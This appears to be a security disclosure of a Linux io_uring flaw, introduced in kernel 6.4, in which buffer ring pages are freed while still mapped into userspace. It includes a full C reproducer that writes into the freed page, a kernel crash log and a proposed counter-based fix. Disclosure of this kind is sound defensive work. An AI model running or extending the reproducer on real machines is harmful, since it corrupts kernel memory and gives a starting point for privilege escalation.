Linux >=6.4: io_uring: page UAF via buffer ring mmap
Since commit c56e022c0a27 ("io_uring: add support for user mapped provided
buffer ring"), which landed in Linux 6.4, io_uring makes it possible to
allocate, mmap, and deallocate "buffer rings".
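As a rough first check of whether a kernel is new enough to have this feature at all, the release string can be compared against 6.4. This is only a sketch: release_has_pbuf_ring_mmap() is a hypothetical helper, and a version number alone says nothing about backports or about whether a fix has been applied.

```c
#include <stdbool.h>
#include <stdio.h>

/*
 * Hypothetical helper: returns true if a release string such as
 * "6.7.0-rc3" (e.g. utsname.release from uname(2)) is at least 6.4.
 * Assumption: the string starts with "<major>.<minor>".
 */
bool release_has_pbuf_ring_mmap(const char *release)
{
    unsigned int major = 0, minor = 0;

    if (sscanf(release, "%u.%u", &major, &minor) != 2)
        return false; /* unparseable: treat as unsupported */
    return major > 6 || (major == 6 && minor >= 4);
}
```

The intended input is the release field filled in by uname(2); the result only indicates that the mmap-able buffer ring feature is likely present.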
A "buffer ring" can be allocated with
io_uring_register(..., IORING_REGISTER_PBUF_RING, ...) and later deallocated
with io_uring_register(..., IORING_UNREGISTER_PBUF_RING, ...).
It can be mapped into userspace using mmap() with offset
IORING_OFF_PBUF_RING|..., which creates a VM_PFNMAP mapping, meaning the MM
subsystem will treat the mapping as a set of opaque page frame numbers not
associated with any corresponding pages; this implies that the calling code is
responsible for ensuring that the mapped memory can not be freed before the
userspace mapping is removed.
However, there is no mechanism to ensure this in io_uring: It is possible to
just register a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then
free the buffer ring's pages with IORING_UNREGISTER_PBUF_RING, leaving free
pages mapped into userspace, which is a fairly easily exploitable situation.
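For reference, a sketch of how the mmap offset for a given buffer group is formed, assuming the uapi encoding in which the buffer group ID is shifted by IORING_OFF_PBUF_SHIFT and OR'd into IORING_OFF_PBUF_RING. The constants below are local copies under hypothetical names, with values as I understand them from <linux/io_uring.h>; check them against your own headers. pbuf_ring_mmap_offset() is an illustrative helper, not an existing API.

```c
#include <stdint.h>

/* Local copies (assumed values) of the uapi constants. */
#define PBUF_RING_OFF   0x80000000ULL /* believed to match IORING_OFF_PBUF_RING */
#define PBUF_RING_SHIFT 16            /* believed to match IORING_OFF_PBUF_SHIFT */

/* Compute the mmap() offset that selects the buffer ring of group `bgid`. */
uint64_t pbuf_ring_mmap_offset(uint16_t bgid)
{
    return PBUF_RING_OFF | ((uint64_t)bgid << PBUF_RING_SHIFT);
}
```

For bgid 0, as in the reproducer below, this reduces to plain IORING_OFF_PBUF_RING.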
reproducer:
==============================================================
#define _GNU_SOURCE
#include <unistd.h>
#include <err.h>
#include <string.h>
#include <stdio.h>
#include <ctype.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <linux/io_uring.h>

/* Bail out with a message if a syscall-style expression returns -1. */
#define SYSCHK(x) ({ \
  typeof(x) __res = (x); \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res; \
})

int main(void) {
  struct io_uring_params params = {
    .flags = IORING_SETUP_NO_SQARRAY
  };
  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));
  printf("uring_fd = %d\n", uring_fd);

  /* Register a kernel-allocated buffer ring for buffer group 0. */
  struct io_uring_buf_reg reg = {
    .ring_entries = 1,
    .bgid = 0,
    .flags = IOU_PBUF_RING_MMAP
  };
  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, &reg, 1));

  /* Map the ring's page into userspace. */
  void *pbuf_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_PBUF_RING));
  printf("pbuf mapped at %p\n", pbuf_mapping);

  /* Unregister the ring: the page is freed while it is still mapped. */
  struct io_uring_buf_reg unreg = { .bgid = 0 };
  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, &unreg, 1));

  /* Keep writing through the stale mapping into the freed page. */
  while (1) {
    memset(pbuf_mapping, 0xaa, 0x1000);
    usleep(100000);
  }
}
==============================================================
When run on a system with the following debug options enabled:
CONFIG_PAGE_TABLE_CHECK=y
CONFIG_PAGE_TABLE_CHECK_ENFORCED=y
this will splat with the following error when __page_table_check_zero()
detects that a page that is being freed is still mapped into userspace:
==============================================================
------------[ cut here ]------------
kernel BUG at mm/page_table_check.c:146!
invalid opcode: 0000 [#1] PREEMPT SMP KASAN
CPU: 1 PID: 554 Comm: uring-mmap-pbuf Not tainted 6.7.0-rc3 #360
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
RIP: 0010:__page_table_check_zero+0x136/0x150
Code: a8 40 0f 84 1f ff ff ff 48 8d 7b 48 e8 93 8a fd ff 48 8b 6b 48 40 f6 c5 01 0f 84 08 ff ff ff 48 83 ed 01 e9 02 ff ff ff 0f 0b <0f> 0b 0f 0b 0f 0b 5b 48 89 ef 5d 41 5c 41 5d 41 5e e9 f4 ea ff ff
RSP: 0018:ffff888029aa7c70 EFLAGS: 00010202
RAX: 0000000000000001 RBX: ffff8880011789f0 RCX: dffffc0000000000
RDX: 0000000000000007 RSI: ffffffff83ca598e RDI: ffff8880011789f4
RBP: ffff8880011789f0 R08: 0000000000000000 R09: ffffed100022f13e
R10: ffff8880011789f7 R11: 0000000000000000 R12: 0000000000000000
R13: ffff8880011789f4 R14: 0000000000000001 R15: 0000000000000000
FS: 00007f745f01a500(0000) GS:ffff88806d280000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00005610bbfb8008 CR3: 0000000016ac3004 CR4: 0000000000770ef0
PKRU: 55555554
Call Trace:
<TASK>
[...]
free_unref_page_prepare+0x282/0x450
free_unref_page+0x45/0x170
__io_remove_buffers.part.0+0x38c/0x3c0
io_unregister_pbuf_ring+0x146/0x1e0
[...]
__do_sys_io_uring_register+0xa03/0x11c0
[...]
do_syscall_64+0x43/0xf0
entry_SYSCALL_64_after_hwframe+0x6e/0x76
RIP: 0033:0x7f745ef4bf59
Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 07 6f 0c 00 f7 d8 64 89 01 48
RSP: 002b:00007ffe29cbac98 EFLAGS: 00000202 ORIG_RAX: 00000000000001ab
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f745ef4bf59
RDX: 00007ffe29cbaca0 RSI: 0000000000000017 RDI: 0000000000000003
RBP: 00007ffe29cbadb0 R08: 00007ffe29cbab6c R09: 0000000000000000
R10: 0000000000000001 R11: 0000000000000202 R12: 00005610bbb700d0
R13: 00007ffe29cbae90 R14: 0000000000000000 R15: 0000000000000000
</TASK>
Modules linked in:
---[ end trace 0000000000000000 ]---
==============================================================
When run on a system without those options, this reproducer will randomly
corrupt memory and, on most runs, probably crash the machine.
I tried it once; after I then used some other programs, I got a random
kernel #GP fault.
One way to fix this might be to add some mapping counter to
`struct io_buffer_list`, and then:
- increment that counter in io_uring_validate_mmap_request() for PBUF_RING
mappings
- increment that counter in the vm_operations_struct ->open() handler
- decrement that counter in the vm_operations_struct ->close() handler
- refuse IORING_UNREGISTER_PBUF_RING if the counter is non-zero?
Or alternatively free the io_buffer_list when the counter drops to zero, and let
the counter start at 1.
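The first variant of the counter scheme above (refusing unregistration while mappings exist) can be modeled in plain userspace C to check the intended state transitions. This is only a sketch: struct buffer_list_model and the model_* functions are hypothetical names that do not exist in the kernel, the choice of -EBUSY as the refusal error is an assumption, and locking is ignored entirely.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>

/* Hypothetical stand-in for the kernel's struct io_buffer_list. */
struct buffer_list_model {
    unsigned int map_count; /* number of live userspace mappings */
    bool pages_allocated;   /* whether the ring's pages still exist */
};

/* Models a successful mmap() of the ring (the mmap validation step). */
void model_mmap(struct buffer_list_model *bl)
{
    assert(bl->pages_allocated);
    bl->map_count++;
}

/* Models ->open(): an existing VMA was duplicated or split. */
void model_vma_open(struct buffer_list_model *bl)
{
    bl->map_count++;
}

/* Models ->close(): a VMA covering the ring went away. */
void model_vma_close(struct buffer_list_model *bl)
{
    assert(bl->map_count > 0);
    bl->map_count--;
}

/* Models IORING_UNREGISTER_PBUF_RING: refuse while mappings exist. */
int model_unregister(struct buffer_list_model *bl)
{
    if (bl->map_count != 0)
        return -EBUSY; /* assumed error code */
    bl->pages_allocated = false; /* pages may now be freed safely */
    return 0;
}
```

In this model, the reproducer's sequence (register, mmap, unregister) would fail at the unregister step, and the pages would only become freeable once every mapping has been closed.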
(I'm not sure what the lifetime rules for other accesses to the io_buffer_list's
memory are - it looks like most paths only access the io_buffer_list under some
lock? Is the idea that the kernel actually accesses the buffer through userspace
pointers, or something like that? I'll have to stare at this some more before I
understand it...)
This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2024-02-26.
Found by: jannh@google.com